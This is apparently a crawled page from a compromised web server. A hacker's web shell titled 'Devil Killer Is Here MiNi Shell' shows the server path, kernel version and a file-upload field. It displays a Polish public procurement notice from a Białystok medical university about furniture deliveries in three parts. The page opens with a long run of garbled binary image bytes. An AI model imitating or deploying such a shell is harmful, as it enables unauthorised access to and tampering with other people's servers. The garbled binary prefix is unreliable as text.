JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211012/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211012/0022911201-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dost.z transpor. rozładunkiem,wniesieniem,zamontowaniem,dostarczeniemInstrukcjiStanowiskowejI jejWdrożeniem,serwis.iGwar.MebliZeStaliNierdzewnejImebliBiurowych do Jed.Org.UMB z podziałem na 3 części. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">UNIWERSYTET MEDYCZNY W BIAŁYMSTOKU</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Dział Zamówień Publicznych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000288604</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Jana Kilińskiego 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Białystok</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">15-089</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL841 - Białostocki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">85 748 56 25, 85 748 57 39, 748 56 26, 748 56 40, 748 55 39, 748 56 27, 686 51 37</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zampubl@umb.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.umb.edu.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dost.z transpor. rozładunkiem,wniesieniem,zamontowaniem,dostarczeniemInstrukcjiStanowiskowejI jejWdrożeniem,serwis.iGwar.MebliZeStaliNierdzewnejImebliBiurowych do Jed.Org.UMB z podziałem na 3 części. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-71b87a80-2b31-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00229112</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00124406/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.6 Meble biurowe do różnych jednostek organizacyjnych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://umedbialystok.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://umedbialystok.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">3. Ogólne<br/>zasady korzystania z Platformy<br/>3.1. zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie<br/>Uniwersytetu Medycznego w Białymstoku; https://umedbialystok.ezamawiajacy.pl, lub<br/>https://oneplace.marketplanet.pl<br/>3.2. Wykonawca po wybraniu opcji „Przystąp do postępowania” zostanie przekierowany do strony:<br/>https://umedbialystok.ezamawiajacy.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do<br/>założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego;<br/>podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje<br/>regulamin, klika polecenie „zarejestruj się”.<br/>3.3. Rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym Zamawiający<br/>zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia Oferty w<br/>postaci elektronicznej.<br/>Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma informację, o możliwości<br/>przyspieszenia procedury założenia konta, wówczas należy skontaktować się pod numerem telefonu<br/>podanym w ww. potwierdzeniu.<br/>3.4. Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu. Komunikacja<br/>między Zamawiającym a Wykonawcami, w szczególności zawiadomienia oraz informacje,<br/>przekazywane są w formie elektronicznej za pośrednictwem Platformy Zakupowej. Za datę<br/>przekazania zaświadczeń oraz informacji przyjmuje się datę ich wysłania za pośrednictwem zakładki<br/>„Korespondencja”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>􀀀 administratorem Pani/Pana danych osobowych jest Uniwersytet Medyczny w Białymstoku, ul. Jana<br/>Kilińskiego 1, 15-089 Białystok, NIP 542-021-17-17, REGON 000288604, reprezentowany przez<br/>Rektora;<br/>􀀀 Uniwersytet Medyczny w Białymstoku powołał Inspektora Ochrony Danych, z którym można<br/>skontaktować się w sprawach danych osobowych wysyłając informacje na adres e-mail:<br/>iod@umb.edu.pl lub poprzez inne dane kontaktowe podane na stronach internetowych Uczelni,<br/>􀀀 Pani/Pana dane osobowe przetwarzane będą w celu związanym z prowadzeniem postępowania o<br/>udzielenie zamówienia publicznego na podstawie art. 6 ust. 1 lit. c RODO (tj. obowiązku prawnego<br/>ciążącego na administratorze – ustawa Prawo zamówień publicznych),<br/>􀀀 odbiorcami Pani/Pana danych osobowych mogą być osoby lub podmioty, którym udostępniona<br/>zostanie dokumentacja postępowania na podstawie art. 18 ust. 1 oraz art. 74 ustawy z dnia 11<br/>września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2019 r., poz. 2019, ze zm.), dalej „ustawa<br/>Pzp” , osoby wnioskujące o udostępnienie informacji publicznej, właściciel platformy do publikowania<br/>postępowań o udzielenie zamówienia publicznego,<br/>􀀀 Pani/Pana dane osobowe w związku z jawnością postępowania o udzielenie zamówienia<br/>publicznego mogą być przekazywane do państw trzecich,<br/>􀀀 Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4<br/>lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy lub też przez okres<br/>dłuższy w przypadku postępowań finansowanych ze środków unijnych;<br/>􀀀 obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/>􀀀 w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, o którym mowa w art. 22 RODO;<br/>􀀀 posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych<br/>(skorzystanie z prawa do sprostowania nie może naruszać integralności protokołu oraz jego<br/>załączników),<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193<br/>Warszawa, gdy uzna Pani/Pan, że przetwarzanie przez administratora Pani/Pana danych osobowych<br/>narusza przepisy RODO;<br/>􀀀 nie przysługuje Pani/Panu:<br/>− prawo do usunięcia danych osobowych w związku z art. 17 ust. 3 lit. b, d lub e RODO;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− prawo do sprzeciwu wobec przetwarzania danych osobowych, na podstawie art. 21 RODO, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">AZP.25.1.66.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa wraz z transportem, rozładunkiem, wniesieniem, zamontowaniem, dostarczeniem instrukcji stanowiskowej i jej wdrożeniem, serwisowaniem i gwarancją mebli ze stali nierdzewnej do CENTRUM MEDYCYNY DOŚWIADCZALNEJ Uniwersytetu Medycznego w Białymstoku. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33192000-2 - Meble medyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">35 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty najkorzystniejszej spośród ważnych ofert<br/>Zamawiający będzie kierował się następującymi kryteriami:<br/>- cena – 60%,<br/>- okres gwarancji – 40%<br/>2. Ocenie zostaną poddane oferty niepodlegające odrzuceniu.<br/>3. Ilość punktów PC, jaką otrzyma rozpatrywana i oceniana oferta w kryterium „cena”, zostanie<br/>wyznaczona według wzoru:<br/>PC = (CN / CR ) x 60<br/>gdzie:<br/>CN – najniższa cena spośród ofert niepodlegających odrzuceniu,<br/>CR – cena oferty rozpatrywanej,<br/>60 – maksymalna ilość punktów, jaką może uzyskać oferta wg kryterium „cena” - 60%.<br/>5. Ilość punktów PG, jaką otrzyma rozpatrywana i oceniana oferta w kryterium „okres gwarancji”<br/>zostanie przyznana w następujący sposób*:<br/>PG of.<br/>PG = ----------- x 40<br/>PG max.<br/>gdzie:<br/>PG of. – termin gwarancji w ofercie badanej,<br/>PG max. – najdłuższy termin gwarancji możliwy do zaoferowania<br/>40 - maksymalna ilość punktów, jaką może uzyskać oferta wg kryterium „okres gwarancji” - 40%.<br/>*UWAGA: Podstawą oceny oferty w kryterium "okres gwarancji" będzie wypełniony załącznik Nr 3 do<br/>SWZ (Tabela oceny okresu gwarancji). W kryterium okres gwarancji (PG), wartości PG of. obliczona<br/>będzie na podstawie danych podanych przez Wykonawcę w tabeli oferowanych warunków gwarancji<br/>(wg zał. nr 3 do SIWZ).<br/>5. Jako oferta najkorzystniejsza wybrana</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa wraz z rozładunkiem, wniesieniem, montażem oraz dostarczeniem instrukcji stanowiskowej i jej wdrożeniem, serwisowaniem i gwarancją szafek wiszących dla ZAKŁADU ORTODONCJI UMB </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39130000-2 - Meble biurowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">35 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty najkorzystniejszej spośród ważnych ofert<br/>Zamawiający będzie kierował się następującymi kryteriami:<br/>- cena – 60%,<br/>- okres gwarancji – 40%<br/>2. Ocenie zostaną poddane oferty niepodlegające odrzuceniu.<br/>3. Ilość punktów PC, jaką otrzyma rozpatrywana i oceniana oferta w kryterium „cena”, zostanie<br/>wyznaczona według wzoru:<br/>PC = (CN / CR ) x 60<br/>gdzie:<br/>CN – najniższa cena spośród ofert niepodlegających odrzuceniu,<br/>CR – cena oferty rozpatrywanej,<br/>60 – maksymalna ilość punktów, jaką może uzyskać oferta wg kryterium „cena” - 60%.<br/>5. Ilość punktów PG, jaką otrzyma rozpatrywana i oceniana oferta w kryterium „okres gwarancji”<br/>zostanie przyznana w następujący sposób*:<br/>PG of.<br/>PG = ----------- x 40<br/>PG max.<br/>gdzie:<br/>PG of. – termin gwarancji w ofercie badanej,<br/>PG max. – najdłuższy termin gwarancji możliwy do zaoferowania<br/>40 - maksymalna ilość punktów, jaką może uzyskać oferta wg kryterium „okres gwarancji” - 40%.<br/>*UWAGA: Podstawą oceny oferty w kryterium "okres gwarancji" będzie wypełniony załącznik Nr 3 do<br/>SWZ (Tabela oceny okresu gwarancji). W kryterium okres gwarancji (PG), wartości PG of. obliczona<br/>będzie na podstawie danych podanych przez Wykonawcę w tabeli oferowanych warunków gwarancji<br/>(wg zał. nr 3 do SIWZ).<br/>5. Jako oferta najkorzystniejsza wybrana</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa wraz z transportem, rozładunkiem, wniesieniem, zamontowaniem, dostarczeniem instrukcji stanowiskowej i jej wdrożeniem, serwisowaniem i gwarancją wyposażenia meblowego do pomieszczeń w DOMU STUDENTA NR 1 Uniwersytetu Medycznego w Białymstoku. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39130000-2 - Meble biurowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">49 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty najkorzystniejszej spośród ważnych ofert<br/>Zamawiający będzie kierował się następującymi kryteriami:<br/>- cena – 60%,<br/>- okres gwarancji – 40%<br/>2. Ocenie zostaną poddane oferty niepodlegające odrzuceniu.<br/>3. Ilość punktów PC, jaką otrzyma rozpatrywana i oceniana oferta w kryterium „cena”, zostanie<br/>wyznaczona według wzoru:<br/>PC = (CN / CR ) x 60<br/>gdzie:<br/>CN – najniższa cena spośród ofert niepodlegających odrzuceniu,<br/>CR – cena oferty rozpatrywanej,<br/>60 – maksymalna ilość punktów, jaką może uzyskać oferta wg kryterium „cena” - 60%.<br/>5. Ilość punktów PG, jaką otrzyma rozpatrywana i oceniana oferta w kryterium „okres gwarancji”<br/>zostanie przyznana w następujący sposób*:<br/>PG of.<br/>PG = ----------- x 40<br/>PG max.<br/>gdzie:<br/>PG of. – termin gwarancji w ofercie badanej,<br/>PG max. – najdłuższy termin gwarancji możliwy do zaoferowania<br/>40 - maksymalna ilość punktów, jaką może uzyskać oferta wg kryterium „okres gwarancji” - 40%.<br/>*UWAGA: Podstawą oceny oferty w kryterium "okres gwarancji" będzie wypełniony załącznik Nr 3 do<br/>SWZ (Tabela oceny okresu gwarancji). W kryterium okres gwarancji (PG), wartości PG of. obliczona<br/>będzie na podstawie danych podanych przez Wykonawcę w tabeli oferowanych warunków gwarancji<br/>(wg zał. nr 3 do SIWZ).<br/>5. Jako oferta najkorzystniejsza wybrana</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, zamiast podmiotowych środków<br/>dowodowych:<br/>- w celu potwierdzenia braku podstaw wykluczenia - aktualnego na dzień złożenia 